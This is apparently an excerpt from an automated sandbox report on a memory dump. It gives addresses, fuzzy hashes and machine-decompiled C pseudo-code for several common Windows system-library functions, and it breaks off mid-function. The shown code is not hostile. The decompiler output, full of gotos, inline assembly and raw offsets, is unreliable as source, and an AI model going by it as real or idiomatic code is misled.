0x0136fae4
0x0136fae7
0x0136faec
0x0136faf8
0x0136fb00
0x0136fb07
0x0136fb0f
0x0136fb0f
0x0136fb07
0x00000000
0x0136faf8
0x0136fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 013ABE0F
X2, xrefs: 0136FAF1

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$X2
API String ID: 0-3940770057
Opcode ID: 06e621d1f3a4719e651ee57f056ecce335d9e14f47d160fc3de2c64f616a6322
Instruction ID: 9e4ea896e7476fbb1a07f3c9f44fdb2d83afc7f83b2745e552f750efe2717799
Opcode Fuzzy Hash: 06e621d1f3a4719e651ee57f056ecce335d9e14f47d160fc3de2c64f616a6322
Instruction Fuzzy Hash: 9BA10371B006068BEB25DF6CD460B7ABBADEF4471CF048569EA16CB69CDB34D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013FE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E013FE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E013FBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E013FBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E013FAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01379730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E013FA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E013FA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01379730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E013FA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E013FA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01352280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0134B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0134FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01357D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E013EFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x013fe547
0x013fe549
0x013fe54f
0x013fe553
0x013fe557
0x013fe55a
0x013fe55c
0x013fe55f
0x013fe561
0x013fe567
0x013fe56b
0x013fe7e2
0x00000000
0x013fe571
0x013fe575
0x013fe577
0x013fe57b
0x013fe57c
0x013fe57d
0x013fe57e
0x013fe57f
0x013fe588
0x013fe58f
0x013fe591
0x013fe592
0x013fe592
0x013fe596
0x013fe59e
0x013fe5a0
0x013fe5a6
0x013fe61d
0x013fe61d
0x013fe621
0x013fe623
0x013fe630
0x013fe630
0x013fe7e6
0x013fe7eb
0x013fe7ed
0x013fe7f4
0x013fe7fa
0x013fe7ff
0x013fe7ff
0x013fe80a
0x013fe812
0x013fe812
0x013fe5ab
0x013fe5b4
0x013fe5b9
0x013fe5be
0x013fe5c0
0x013fe5c2
0x013fe5c8
0x013fe5c9
0x013fe5cb
0x013fe5cc
0x013fe5d5
0x013fe5e4
0x013fe5f1
0x013fe5f8
0x013fe5f8
0x013fe5d5
0x013fe602
0x013fe616
0x013fe63d
0x013fe644
0x013fe64d
0x013fe652
0x013fe657
0x013fe659
0x013fe65b
0x013fe661
0x013fe662
0x013fe664
0x013fe665
0x013fe66e
0x013fe67d
0x013fe68a
0x013fe691
0x013fe691
0x013fe66e
0x013fe6b0
0x00000000
0x013fe6b6
0x013fe6bd
0x013fe6c7
0x013fe6d7
0x013fe6d9
0x013fe6db
0x013fe6de
0x013fe6e3
0x013fe6f3
0x013fe6fc
0x013fe700
0x013fe700
0x013fe704
0x013fe70a
0x013fe70a
0x013fe713
0x013fe716
0x013fe719
0x013fe720
0x013fe761
0x013fe76b
0x013fe774
0x013fe77a
0x013fe77a
0x013fe78a
0x013fe791
0x013fe799
0x013fe79b
0x013fe79f
0x013fe7aa
0x013fe7c0
0x013fe7ac
0x013fe7b2
0x013fe7b9
0x013fe7b9
0x013fe7c7
0x013fe806
0x00000000
0x013fe7c9
0x013fe7d1
0x013fe7d8
0x00000000
0x013fe7d8
0x00000000
0x00000000
0x013fe722
0x013fe72e
0x013fe748
0x013fe74c
0x013fe754
0x013fe756
0x013fe75c
0x013fe75c
0x00000000
0x013fe75c
0x013fe758
0x013fe758
0x00000000
0x013fe758
0x013fe750
0x00000000
0x00000000
0x013fe752
0x00000000
0x013fe752
0x013fe730
0x013fe735
0x013fe73d
0x013fe73f
0x00000000
0x00000000
0x013fe741
0x013fe741
0x00000000
0x013fe741
0x013fe739
0x00000000
0x00000000
0x013fe73b
0x00000000
0x013fe73b
0x013fe722
0x013fe720
0x013fe6b0
0x013fe618
0x00000000
0x013fe618

Strings

`, xrefs: 013FE670
`, xrefs: 013FE5D7

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 03772ce183cc9a45ae2c777fd0bd67be6cc97d99a30bf800f4f903886e0b5052
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: E89171712043469FE724CE29C845B1BBBE5AF84728F15893DF799CB2A0E774E908CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013B51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E013B51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x14105f0);
				E0138D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0134EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E013B53CA(0);
						return E0138D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0137F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01353690(1, _t117, 0x1311810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0137AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01354620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0137AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E013B500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01379860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x013b51be
0x013b51c3
0x013b51c8
0x013b51cd
0x013b51d0
0x013b51d3
0x013b51d8
0x013b51db
0x013b51de
0x013b51e0
0x013b51e3
0x013b51e6
0x013b51e8
0x013b5342
0x013b5351
0x013b5356
0x013b535a
0x013b5360
0x013b5363
0x013b5366
0x013b5369
0x013b5369
0x013b536b
0x013b536b
0x013b5370
0x013b53a3
0x013b53a4
0x013b53a6
0x013b53ab
0x013b53ab
0x013b53ae
0x013b53ae
0x013b53b5
0x013b53bf
0x013b53bf
0x013b5375
0x013b5396
0x013b53a0
0x013b53a0
0x00000000
0x013b5396
0x013b5377
0x013b5379
0x013b537f
0x013b538c
0x013b5390
0x00000000
0x013b5390
0x013b51ee
0x013b51f1
0x013b5301
0x013b5310
0x013b5315
0x013b5318
0x013b531b
0x013b5320
0x013b532e
0x013b5331
0x00000000
0x013b5331
0x013b5328
0x013b5329
0x00000000
0x013b5329
0x013b51fa
0x013b5235
0x013b5236
0x013b5239
0x013b523f
0x013b5240
0x013b5241
0x013b5242
0x013b5246
0x013b5247
0x013b524e
0x013b5251
0x013b5267
0x013b5269
0x013b526e
0x013b527d
0x013b527e
0x013b5281
0x013b5282
0x013b5287
0x013b5288
0x013b528a
0x013b528f
0x013b5294
0x00000000
0x00000000
0x013b529a
0x013b529c
0x013b529e
0x013b529e
0x013b52a4
0x013b52b0
0x00000000
0x00000000
0x013b52ba
0x013b52bc
0x013b52bc
0x013b52d4
0x013b52d9
0x013b52dc
0x013b52e1
0x00000000
0x00000000
0x013b52e7
0x013b52f4
0x00000000
0x013b52f4
0x013b5270
0x00000000
0x013b5270
0x013b51fc
0x013b51fd
0x013b5202
0x013b5203
0x013b5205
0x013b520a
0x013b520f
0x00000000
0x00000000
0x013b521b
0x013b5226
0x013b522b
0x013b521d
0x013b521d
0x013b5222
0x013b5222
0x013b522d
0x00000000

Strings

Legacy, xrefs: 013B5226
UEFI, xrefs: 013B521D

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c5acfd9dea81511891de81c79cf9c759018231b794df13867ac74d6b3739a7ba
Instruction ID: 8c036f1cea2145e58d522f7504be9acad127ec2f0305d0e9288d4fe4ca22151a
Opcode Fuzzy Hash: c5acfd9dea81511891de81c79cf9c759018231b794df13867ac74d6b3739a7ba
Instruction Fuzzy Hash: D55159B1A056099FDB24DFA88880BAEBBF8BB48708F14402DE659EB651E6719941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0133B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0133B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x140f7a8);
				E0138D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0138D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0137D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0137F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0138DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0137B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0137B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0137E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0137A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0133b171
0x0133b171
0x0133b171
0x0133b171
0x0133b171
0x0133b176
0x0133b17b
0x0133b180
0x0133b186
0x0133b18f
0x0133b198
0x0133b1a4
0x0133b1aa
0x01394802
0x01394802
0x01394805
0x0139480c
0x0139480e
0x0133b1d1
0x0133b1d3
0x0133b1de
0x0133b1de
0x01394817
0x0139481e
0x01394820
0x01394822
0x01394822
0x01394824
0x01394824
0x0139482a
0x00000000
0x00000000
0x01394835
0x0139483a
0x0139483d
0x0139483f
0x01394842
0x01394842
0x01394842
0x01394846
0x0139484c
0x0139484e
0x01394851
0x01394851
0x01394853
0x01394854
0x01394854
0x01394858
0x0139485a
0x0139485a
0x0139485d
0x0139485f
0x01394861
0x01394861
0x01394866
0x0139486b
0x0139486e
0x01394871
0x01394876
0x01394876
0x01394878
0x0139487b
0x01394884
0x01394884
0x00000000
0x0139487d
0x0139487d
0x01394882
0x01394889
0x01394889
0x0139488f
0x01394891
0x013948e0
0x013948e2
0x013948e4
0x013948e4
0x013948e7
0x013948e7
0x013948ed
0x013948f4
0x013948f6
0x01394951
0x01394951
0x01394953
0x01394953
0x01394956
0x01394956
0x01394958
0x01394959
0x01394959
0x0139495d
0x0139495d
0x0139495f
0x0139495f
0x01394965
0x01394969
0x013949ba
0x013949ba
0x013949c1
0x013949c5
0x013949cc
0x013949d4
0x013949d7
0x013949da
0x013949e4
0x013949e5
0x013949f3
0x01394a02
0x00000000
0x01394a02
0x01394972
0x01394974
0x00000000
0x00000000
0x01394976
0x01394979
0x01394982
0x01394983
0x01394984
0x0139498b
0x0139498d
0x01394991
0x01394993
0x01394999
0x0139499d
0x013949a2
0x013949a2
0x013949a2
0x01394999
0x013949ac
0x00000000
0x013949b3
0x013948f8
0x013948fe
0x00000000
0x00000000
0x00000000
0x013948fe
0x01394895
0x0139489c
0x013948ad
0x013948b2
0x013948b5
0x013948b7
0x013948ba
0x013948bc
0x013948c6
0x013948c6
0x013948cb
0x013948d1
0x013948d4
0x013948d8
0x013948d8
0x00000000
0x013948d8
0x013948be
0x013948c0
0x00000000
0x00000000
0x013948c2
0x00000000
0x00000000
0x00000000
0x013948c4
0x00000000
0x01394882
0x0139487b
0x01394904
0x01394906
0x00000000
0x00000000
0x01394908
0x0139490e
0x00000000
0x00000000
0x01394910
0x01394917
0x01394917
0x00000000
0x01394917
0x0133b1ba
0x013947f9
0x013947fc
0x00000000
0x00000000
0x00000000
0x013947fc
0x0133b1c0
0x0133b1c0
0x0133b1c3
0x0133b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 013948AD

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 7acef43040edfd8d8be23a4657d84444c39f77f4a11945122516d3e6ae73c441
Instruction ID: c4a1f7fcbaf95301f3eb7ae7ef3bdd9562059759d0115c18aeabb3a280b118a0
Opcode Fuzzy Hash: 7acef43040edfd8d8be23a4657d84444c39f77f4a11945122516d3e6ae73c441
Instruction Fuzzy Hash: 7D51DF71D0425A8EEF31DF68CA44BBEBFB0BF00718F1041ADD859AB282D7754942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0135B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0135B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x142d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01357D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01408CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01379E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0137B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
